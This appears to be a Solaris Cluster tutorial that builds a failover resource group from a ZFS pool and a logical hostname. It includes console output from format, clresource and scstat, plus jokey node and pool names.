=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Offline
                 Monyet2         No             Offline
                 Monyet3         No             Offline



Create the ZFS pool that will hold the movies – ‘poolBOKEP’ – before adding it as a cluster resource:

root@Monyet1:~# echo | format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
       0. c2d0 <SUN-Disk-40GB cyl 1135 alt 2 hd 96 sec 768>
          /virtual-devices@100/channel-devices@200/disk@0
       1. c3t0d0 <iSCSI Disk-0123 cyl 19455 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2013-03.org.kebonbinatang.storage1%3Adisk00001,0
Specify disk (enter its number): Specify disk (enter its number): 
 
root@Monyet1:~# zpool  create poolBOKEP c3t0d0
root@Monyet1:~# zpool export poolBOKEP



Add ‘poolBOKEP’ to resource group RG-MONYET as an HAStoragePlus resource:

root@Monyet1:~# clresource create -g RG-MONYET -t SUNW.HAStoragePlus -p AffinityOn=TRUE \
-p Zpools=poolBOKEP -p ZpoolsSearchDir=/dev/did/dsk RS-BOKEP-HAS
root@Monyet1:~# clresource list
RS-BOKEP-HAS
root@Monyet1:~# clresource show
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

Import the poolBOKEP pool from earlier:

root@Monyet1:~#  zpool import poolBOKEP

Add a virtual IP resource to resource group RG-MONYET:

root@Monyet1:~# clreslogicalhostname create -g RG-MONYET -h Monyet -N  \
sc_ipmp0@Monyet1,sc_ipmp0@Monyet2,sc_ipmp0@Monyet3 RS-MONYET
 
root@Monyet1:~# clresource list
RS-MONYET
RS-BOKEP-HAS
root@Monyet1:~# clresource show
 
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
 
Resource:                                       RS-MONYET
  Type:                                            SUNW.LogicalHostname:4
  Type_version:                                    4
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
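
Both resources are created enabled, but the capture does not show the group itself being brought online. A sketch of that step (the `-eM` flags, which enable the resources and put the group under cluster management, are an assumption here since the original omits the command):

root@Monyet1:~# clresourcegroup online -eM RG-MONYET
root@Monyet1:~# clresourcegroup status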

From here it’s just a matter of moving the resource group between the other Monyet nodes ;)) [failover]

root@Monyet1:~# clresourcegroup switch -n Monyet3 RG-MONYET

or, to hand it back to its most preferred node :-??

root@Monyet1:~#  clresourcegroup remaster RG-MONYET

All that’s left is filling poolBOKEP with movies \:d/ A final status check:

root@Monyet3:~# scstat 
------------------------------------------------------------------
 
-- Cluster Nodes --
 
                    Node name           Status
                    ---------           ------
  Cluster node:     Monyet3             Online
  Cluster node:     Monyet2             Online
  Cluster node:     Monyet1             Online
 
------------------------------------------------------------------
 
-- Cluster Transport Paths --
 
                    Endpoint               Endpoint               Status
                    --------               --------               ------
  Transport path:   Monyet3:net2           Monyet2:net2           Path online
  Transport path:   Monyet3:net0           Monyet2:net0           Path online
  Transport path:   Monyet3:net2           Monyet1:net2           Path online
  Transport path:   Monyet3:net0           Monyet1:net0           Path online
  Transport path:   Monyet2:net2           Monyet1:net2           Path online
  Transport path:   Monyet2:net0           Monyet1:net0           Path online
 
------------------------------------------------------------------
 
-- Quorum Summary from latest node reconfiguration --
 
  Quorum votes possible:      5
  Quorum votes needed:        3
  Quorum votes present:       5
 
 
-- Quorum Votes by Node (current status) --
 
                    Node Name           Present Possible Status
                    ---------           ------- -------- ------
  Node votes:       Monyet3             1        1       Online
  Node votes:       Monyet2             1        1       Online
  Node votes:       Monyet1             1        1       Online
 
 
-- Quorum Votes by Device (current status) --
 
                    Device Name         Present Possible Status
                    -----------         ------- -------- ------
  Device votes:     /dev/did/rdsk/d2s2  2        2       Online
 
------------------------------------------------------------------
 
-- Device Group Servers --
 
                         Device Group        Primary             Secondary
                         ------------        -------             ---------
 
 
-- Device Group Status --
 
                              Device Group        Status              
                              ------------        ------              
 
 
-- Multi-owner Device Groups --
 
                              Device Group        Online Status
                              ------------        -------------
 
------------------------------------------------------------------
 
-- Resource Groups and Resources --
 
            Group Name     Resources
            ----------     ---------
 Resources: RG-MONYET      RS-BOKEP-HAS RS-MONYET
 
 
-- Resource Groups --
 
            Group Name     Node Name                State          Suspended
            ----------     ---------                -----          ---------
     Group: RG-MONYET      Monyet1                  Offline        No
     Group: RG-MONYET      Monyet2                  Online         No
     Group: RG-MONYET      Monyet3                  Offline        No
 
 
-- Resources --
 
            Resource Name  Node Name                State          Status Message
            -------------  ---------                -----          --------------
  Resource: RS-BOKEP-HAS   Monyet1                  Offline        Offline
  Resource: RS-BOKEP-HAS   Monyet2                  Online         Online
  Resource: RS-BOKEP-HAS   Monyet3                  Offline        Offline
 
  Resource: RS-MONYET      Monyet1                  Offline        Offline - LogicalHostname offline.
  Resource: RS-MONYET      Monyet2                  Online         Online - LogicalHostname online.
  Resource: RS-MONYET      Monyet3                  Offline        Offline
 
------------------------------------------------------------------
 
-- IPMP Groups --
 
              Node Name           Group   Status         Adapter   Status
              ---------           -----   ------         -------   ------
  IPMP Group: Monyet3             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet2             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet1             sc_ipmp0 Online         net1      Online
 
------------------------------------------------------------------
